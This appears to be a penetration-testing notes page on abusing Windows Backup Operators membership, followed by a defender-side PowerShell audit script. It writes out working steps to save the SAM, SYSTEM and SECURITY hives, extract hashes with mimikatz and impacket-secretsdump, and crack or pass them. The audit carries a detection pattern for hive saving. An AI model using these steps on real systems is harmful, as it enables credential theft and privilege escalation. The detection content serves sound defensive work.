# Backup Operators

### Overview

The **Backup Operators** group is a built-in group in Windows that grants members the ability to back up and restore files, even if they do not have permission to access the files under normal circumstances. This privilege makes the group particularly powerful for potential abuse in **privilege escalation** scenarios, as **Backup Operators** can access sensitive files like the **SAM** (Security Account Manager) database and system files.

One of the primary ways to exploit **Backup Operators** is by accessing and extracting the **SAM** database.

### Privilege Escalation Steps

1. **Backup the SAM, SYSTEM, and SECURITY Hives:**\
   Use the `reg save` command to back up these registry hives, which contain critical security information (including password hashes).

   ```bat
   reg save hklm\sam c:\Windows\Tasks\sam
   reg save hklm\system c:\Windows\Tasks\system
   reg save hklm\security c:\Windows\Tasks\security
   ```

   `reg save` succeeds here because **Backup Operators** hold the backup privilege, which lets them read files and registry hives they normally would not have access to.
2. **Extract Password Hashes Using Tools**:\
   Once you've backed up the hives, copy them to your attacker machine and use tools like **mimikatz** or **impacket-secretsdump** to extract the password hashes from the **SAM**, then crack them with **John the Ripper**.\
   Examples:

   ```bat
   lsadump::sam /sam:c:\temp\sam /system:c:\temp\system
   ```

   ```bash
   # from the remote shell session: pull the saved hives down to the attacker machine
   download sam /home/abc/Documents/temp/sam
   download system /home/abc/Documents/temp/system
   # on the attacker machine: parse the offline hives (LOCAL = no target host, files only)
   impacket-secretsdump -sam sam -system system LOCAL
   ```
3. **Crack the Hashes or Use Pass-the-Hash**:\
   If the hashes are crackable, you can attempt to crack them and log in with a privileged account. Alternatively, you can use the **pass-the-hash** technique to impersonate a privileged user.
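A defender-side audit for the abuse path above, added here as an example and not taken from the original page or its references: it lists who is in Backup Operators on the host, then scans the Security log for 4688 process-creation events where `reg.exe` saved the SAM, SYSTEM or SECURITY hive (the page's step 1) and for 4732 events adding members to the group. It assumes an elevated Windows PowerShell 5.1+ session and that command-line auditing is enabled; `Get-EventData` and `$HivePattern` are names chosen for this example.

```powershell
# Added defender-side audit for the Backup Operators abuse described above; not code from the
# original page or its references. Assumptions: elevated Windows PowerShell 5.1+ (LocalAccounts
# module), and "Include command line in process creation events" enabled so 4688 carries CommandLine.
$LookbackDays = 7
$Since = (Get-Date).AddDays(-$LookbackDays)

# 1. Membership: every principal listed here holds the backup privilege on this host.
Write-Host "== Backup Operators members on $env:COMPUTERNAME =="
Get-LocalGroupMember -Group 'Backup Operators' |
    Select-Object Name, ObjectClass, PrincipalSource | Format-Table -AutoSize

# Flatten a Security event's EventData into a hashtable keyed by each <Data Name="..."> attribute.
function Get-EventData([System.Diagnostics.Eventing.Reader.EventRecord]$Event) {
    $data = @{}
    $xml = [xml]$Event.ToXml()
    foreach ($n in $xml.Event.EventData.Data) { $data[$n.Name] = $n.'#text' }
    return $data
}

# 2. Process creation (4688) where reg.exe saved the SAM, SYSTEM or SECURITY hive.
#    Matches hklm\sam, HKLM\SAM and HKEY_LOCAL_MACHINE\SAM alike, whatever the output path.
$HivePattern = '(?i)\breg(\.exe)?\b.*\bsave\b.*(hklm|hkey_local_machine)\\(sam|system|security)\b'
$Hits = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688; StartTime = $Since } -ErrorAction SilentlyContinue |
    ForEach-Object {
        $d = Get-EventData $_
        if ($d['CommandLine'] -match $HivePattern) {
            [pscustomobject]@{
                Time        = $_.TimeCreated
                Subject     = "$($d['SubjectDomainName'])\$($d['SubjectUserName'])"
                CommandLine = $d['CommandLine']
            }
        }
    }

# 3. Membership changes: 4732 = member added to a security-enabled local group; keep only this group.
$Adds = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4732; StartTime = $Since } -ErrorAction SilentlyContinue |
    ForEach-Object {
        $d = Get-EventData $_
        if ($d['TargetUserName'] -eq 'Backup Operators') {
            [pscustomobject]@{ Time = $_.TimeCreated; AddedSid = $d['MemberSid']; By = $d['SubjectUserName'] }
        }
    }

Write-Host "`n== reg save of credential hives in the last $LookbackDays days =="
if ($Hits) { $Hits | Format-Table -AutoSize } else { Write-Host 'none found (verify command-line auditing is on)' }
Write-Host "`n== Additions to Backup Operators in the last $LookbackDays days =="
if ($Adds) { $Adds | Format-Table -AutoSize } else { Write-Host 'none found' }
```

Any hit under step 2 that is not a scheduled backup job deserves a ticket: the hives only need saving to disk when someone intends to parse them offline.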

### References

1. <https://notes.dollarboysushil.com/windows-privilege-escalation/group-privileges/backup-operators>
2. <https://r00tven0m.github.io/posts/Domain-Privilege-Escalation-Backup-Operators-Group/>


